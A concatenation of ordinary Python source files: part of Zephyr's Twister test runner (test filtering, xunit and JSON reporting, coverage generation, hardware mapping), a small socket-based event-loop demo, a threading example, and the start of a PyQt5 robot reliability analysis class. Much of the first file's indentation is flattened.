if plat.only_tags and not set(plat.only_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testsuite.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
                # run only quarantined tests to verify their status (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testsuite
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not ts.build_on_all and not integration:
if ts.platform_allow:
a = set(self.default_platforms)
b = set(ts.platform_allow)
c = a.intersection(b)
if c:
                        aa = list(filter(lambda inst: inst.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
                    instances = list(filter(lambda inst: inst.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in ts.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
                for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
            # If integration mode is on, all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testsuite.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
self.instances[instance.name] = instance
                # Such configurations have to be removed from discards to make sure they won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "filtered"
instance.add_missing_testscases(instance.status)
# Remove from discards configurations that must not be discarded
# (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
no_retry_statuses = ['passed', 'skipped', 'filtered']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check,
seed=self.seed
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
@staticmethod
def xunit_testcase(eleTestsuite, name, classname, status, ts_status, reason, duration, runnable, stats, log, build_only_as_skip):
fails, passes, errors, skips = stats
if status in ['skipped', 'filtered']:
duration = 0
eleTestcase = ET.SubElement(
eleTestsuite, "testcase",
classname=classname,
name=f"{name}",
time=f"{duration}")
if status in ['skipped', 'filtered']:
skips += 1
# temporarily add build_only_as_skip to restore existing CI report behaviour
if ts_status == "passed" and not runnable:
tc_type = "build"
else:
tc_type = status
ET.SubElement(eleTestcase, 'skipped', type=f"{tc_type}", message=f"{reason}")
elif status in ["failed", "blocked"]:
fails += 1
el = ET.SubElement(eleTestcase, 'failure', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == "error":
errors += 1
el = ET.SubElement(eleTestcase, 'error', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == 'passed':
if not runnable and build_only_as_skip:
ET.SubElement(eleTestcase, 'skipped', type="build", message="built only")
skips += 1
else:
passes += 1
else:
if not status:
logger.debug(f"{name}: No status")
ET.SubElement(eleTestcase, 'skipped', type=f"untested", message="No results captured, testsuite misconfiguration?")
else:
logger.error(f"{name}: Unknown status '{status}'")
return (fails, passes, errors, skips)
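
    # Illustrative note (hypothetical identifier): a plainly skipped case
    # handled above serializes to something like
    #   <testcase classname="kernel.common" name="kernel.common.timer" time="0">
    #     <skipped type="skipped" message="Skip filter"/>
    #   </testcase>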
# Generate a report with all testsuites instead of doing this per platform
def xunit_report_suites(self, json_file, filename):
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
suites_to_report = all_suites
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
suites_to_report = list(filter(lambda d: d.get('status') != "filtered", all_suites))
for suite in suites_to_report:
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=suite.get("name"), time="0",
timestamp = self.timestamp,
tests="0",
failures="0",
errors="0", skipped="0")
            eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
            # Multiple 'property' elements can be added to 'properties',
            # differing by name and value
            ET.SubElement(eleTSProperties, 'property', name="version", value=version)
            ET.SubElement(eleTSProperties, 'property', name="platform", value=suite.get("platform"))
            ET.SubElement(eleTSProperties, 'property', name="architecture", value=suite.get("arch"))
total = 0
fails = passes = errors = skips = 0
handler_time = suite.get('execution_time', 0)
runnable = suite.get('runnable', 0)
duration += float(handler_time)
ts_status = suite.get('status')
for tc in suite.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', suite.get('reason', 'Unknown'))
log = tc.get("log", suite.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def xunit_report(self, json_file, filename, selected_platform=None, full_report=False):
if selected_platform:
selected = [selected_platform]
logger.info(f"Writing target report for {selected_platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
for platform in selected:
suites = list(filter(lambda d: d['platform'] == platform, all_suites))
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
non_filtered = list(filter(lambda d: d.get('status') != "filtered", suites))
if not non_filtered:
continue
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=platform,
timestamp = self.timestamp,
time="0",
tests="0",
failures="0",
errors="0", skipped="0")
            eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
            # Multiple 'property' elements can be added to 'properties',
            # differing by name and value
            ET.SubElement(eleTSProperties, 'property', name="version", value=version)
total = 0
fails = passes = errors = skips = 0
for ts in suites:
handler_time = ts.get('execution_time', 0)
runnable = ts.get('runnable', 0)
duration += float(handler_time)
ts_status = ts.get('status')
# Do not report filtered testcases
if ts_status == 'filtered' and not self.detailed_skipped_report:
continue
if full_report:
for tc in ts.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', ts.get('reason', 'Unknown'))
log = tc.get("log", ts.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
else:
reason = ts.get('reason', 'Unknown')
name = ts.get("name")
classname = f"{platform}:{name}"
log = ts.get("log")
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, ts_status, ts_status, reason, duration, runnable,
(fails, passes, errors, skips), log, False)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def json_report(self, filename, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
suites = []
for instance in self.instances.values():
suite = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
            ram_size = instance.metrics.get("ram_size", 0)
            rom_size = instance.metrics.get("rom_size", 0)
suite = {
"name": instance.testsuite.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
}
if instance.run_id:
suite['run_id'] = instance.run_id
suite["runnable"] = False
if instance.status != 'filtered':
suite["runnable"] = instance.run
if ram_size:
suite["ram_size"] = ram_size
if rom_size:
suite["rom_size"] = rom_size
if instance.status in ["error", "failed"]:
suite['status'] = instance.status
suite["reason"] = instance.reason
# FIXME
if os.path.exists(handler_log):
suite["log"] = self.process_log(handler_log)
elif os.path.exists(device_log):
suite["log"] = self.process_log(device_log)
else:
suite["log"] = self.process_log(build_log)
elif instance.status == 'filtered':
suite["status"] = "filtered"
suite["reason"] = instance.reason
elif instance.status == 'passed':
suite["status"] = "passed"
elif instance.status == 'skipped':
suite["status"] = "skipped"
suite["reason"] = instance.reason
if instance.status is not None:
suite["execution_time"] = f"{float(handler_time):.2f}"
testcases = []
if len(instance.testcases) == 1:
single_case_duration = f"{float(handler_time):.2f}"
else:
single_case_duration = 0
for case in instance.testcases:
testcase = {}
testcase['identifier'] = case.name
if instance.status:
if single_case_duration:
testcase['execution_time'] = single_case_duration
else:
testcase['execution_time'] = f"{float(case.duration):.2f}"
if case.output != "":
testcase['log'] = case.output
if case.status == "skipped":
if instance.status == "filtered":
testcase["status"] = "filtered"
else:
testcase["status"] = "skipped"
testcase["reason"] = case.reason or instance.reason
else:
testcase["status"] = case.status
if case.reason:
testcase["reason"] = case.reason
testcases.append(testcase)
suite['testcases'] = testcases
suites.append(suite)
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
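
    # Illustrative sketch (hypothetical values): the emitted JSON is shaped like
    #   {"environment": {"os": "posix", "zephyr_version": "v3.1.0", "toolchain": "zephyr"},
    #    "testsuites": [{"name": "tests/foo", "arch": "x86", "platform": "native_posix",
    #                    "status": "passed", "execution_time": "0.10",
    #                    "testcases": [{"identifier": "foo.bar", "status": "passed",
    #                                   "execution_time": "0.10"}]}]}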
def get_testsuite(self, identifier):
results = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
if case == identifier:
results.append(ts)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
Verify if platform name (passed by --platform option, or in yaml file
as platform_allow or integration_platforms options) is correct. If not -
log and raise error.
"""
for platform in platform_names_to_verify:
if platform in self.platform_names:
break
else:
logger.error(f"{log_info} - unrecognized platform - {platform}")
sys.exit(2)
def create_build_dir_links(self):
"""
Iterate through all no-skipped instances in suite and create links
for each one build directories. Those links will be passed in the next
steps to the CMake command.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
Create build directory with original "long" path. Next take shorter
path and link them with original path - create link. At the end
replace build_dir to created link. This link will be passed to CMake
command. This action helps to limit path length which can be
significant during building by CMake on Windows OS.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
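
    # Illustrative note (hypothetical paths): with self.outdir == "twister-out",
    # a long build directory such as twister-out/native_posix/tests/foo would be
    # reachable through the short link twister-out/twister_links/test_0, and
    # instance.build_dir is then rewritten to point at that link.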
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
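
    # Illustrative note (assumed log format): between the GCOV_COVERAGE_DUMP
    # markers, each line of interest is expected to look like
    #   */path/to/file.gcda<a1b2c3...
    # i.e. a leading "*", the file name, a "<" delimiter, then the hex dump
    # that the parser above splits apart.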
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
            # If kobject_hash is given for coverage, gcovr fails,
            # hence skip it; the problem exists only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
    @staticmethod
    def _interleave_list(prefix, lst):
        tuple_list = [(prefix, item) for item in lst]
        return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
runner_params=None,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.runner_params = runner_params
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
runner_params = dut.get('runner_params')
serial_pty = dut.get('serial_pty')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
            connected = dut.get('connected') and ((serial or serial_pty) is not None)
new_dut = DUT(platform=platform,
product=product,
runner=runner,
runner_params=runner_params,
id=id,
serial_pty=serial_pty,
serial=serial,
serial_baud=baud,
connected=connected,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x.get('id', ''))
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
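
# Minimal usage sketch (hypothetical map file name):
#   hwmap = HardwareMap()
#   hwmap.scan(persistent=True)   # probe connected boards over serial
#   hwmap.save("hwmap.yaml")      # merge with, or create, the map file
#   hwmap.dump(connected_only=True)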
|
event_loop_05_thread.py
|
# event_loop_05_thread.py
# This version of the event loop shows how to use sockets and
# I/O multiplexing to implement the to_thread() coroutine
# that runs a specified callable in a separate thread,
# yields the control and resumes when the result is ready.
#
# The event loop is NOT presented in the post.
from collections import deque
import pickle
import selectors
import socket
import time
import types
import threading
class EventLoopThread:
def __init__(self):
self.tasks_to_run = deque([])
self.sel = selectors.DefaultSelector()
def create_task(self, coro):
self.tasks_to_run.append(coro)
@types.coroutine
def sock_recv(self, sock, n):
yield 'wait_read', sock
return sock.recv(n)
@types.coroutine
def sock_sendall(self, sock, data):
yield 'wait_write', sock
sock.sendall(data)
@types.coroutine
def sock_accept(self, sock):
yield 'wait_read', sock
return sock.accept()
@types.coroutine
def to_thread(self, callable):
def callable_wrapper():
result = callable()
sock1.sendall(pickle.dumps(result))
sock1, sock2 = socket.socketpair()
threading.Thread(target=callable_wrapper).start()
yield 'wait_read', sock2
return pickle.loads(sock2.recv(4096))
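
    # Note on to_thread() above: the worker thread pickles the result into one
    # end of the socketpair, which makes the other end readable; the selector
    # in run() then wakes this coroutine, and the pickled bytes are read back
    # and unpickled. A single recv(4096) assumes the pickled result fits in
    # one read.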
def run(self):
while True:
if self.tasks_to_run:
task = self.tasks_to_run.popleft()
try:
op, arg = task.send(None)
except StopIteration:
continue
if op == 'wait_read':
self.sel.register(arg, selectors.EVENT_READ, task)
elif op == 'wait_write':
self.sel.register(arg, selectors.EVENT_WRITE, task)
else:
raise ValueError('Unknown event loop operation:', op)
else:
for key, _ in self.sel.select():
task = key.data
sock = key.fileobj
self.sel.unregister(sock)
self.create_task(task)
# How to use to_thread()
def compute():
# some long computation
time.sleep(2)
return 2
async def coro():
res = await loop.to_thread(compute)
print(res)
if __name__ == '__main__':
loop = EventLoopThread()
loop.create_task(coro())
loop.run()
# Ctrl+C to stop
|
thread_tool.py
|
#!/usr/bin/python
#coding=utf-8
# test thread in python
"""
@brief test thread in python
@date 2018-02-08
"""
try:
    import _thread as thread  # Python 3 name of the low-level module
except ImportError:
    import thread  # Python 2
import threading
import time


def print_num(numbers, a_lock):
    # Hold the lock so the two threads do not interleave their output.
    with a_lock:
        for i in range(numbers):
            print(i)


def print_num_in_multi_thread():
    a_lock = thread.allocate_lock()
    thread.start_new_thread(print_num, (3, a_lock))
    thread.start_new_thread(print_num, (4, a_lock))
    # Threads started via the low-level API die with the interpreter,
    # so give them a moment to finish.
    time.sleep(1)


def how_to_use_sleep():
    while True:
        print("hello")
        time.sleep(10)


def execute_in_thread():
    t = threading.Thread(target=how_to_use_sleep)
    t.start()
    t.join()


# execute_in_thread()
|
potc_gui_v_2.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'potc_analysis_gui.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
#import rospy
import math
import pandas as pd
import os
import sys
import csv
import time
import threading
from datetime import datetime
class POTC_Analysis(object):
"""
threshold_type:
True = System POTC Value
False = System Reliability Value
load_control:
True = Failure Rate Calculation Using Operating Load
False = Only Failure Rate
"""
def __init__(self):
#self.robot_column_no_dict = {"Yuk": {"Count": 21, "1": 3, "2": 26, "3": 49}, "Mesafe": {"1": 3, "2": 27, "3": 51}, "Hiz": {"1": 81, "2": 149, "3": 217}} # 3 Robot
#self.robot_column_no_dict = {"Yuk": {"Count": 19, "1": 3, "2": 24, "3": 45, "4": 66}, "Mesafe": {"1": 3, "2": 25, "3": 47, "4": 69}, "Hiz": {"1": 81, "2": 149, "3": 217}} # 4 Robot
self.robot_column_no_dict = {"Yuk": {"Count": 15, "1": 3, "2": 20, "3": 37, "4": 54, "5": 71, "6": 88}, "Mesafe": {"1": 3, "2": 21, "3": 39, "4": 57, "5": 75, "6": 93}, "Hiz": {"1": 81, "2": 149, "3": 217}} # 6 Robot
self.distance_list = list()
self.robot_main_dict = {"Yuk": dict(), "Mesafe": dict()}
self.current_workspace = self.get_current_workspace()
self.distance_filename = "distances"
"""
# 4 Robot
self.route_load_filename = "1003_routeLoads_distance4"
self.route_set_filename = "1003_routeSet_distance4"
"""
# 6 Robot
self.route_load_filename = "Distancefor6Robot_Load"
self.route_set_filename = "Distancefor6Robot_Route"
self.robot_count = 0
self.initial_configuration_dict = dict()
self.load_control = True
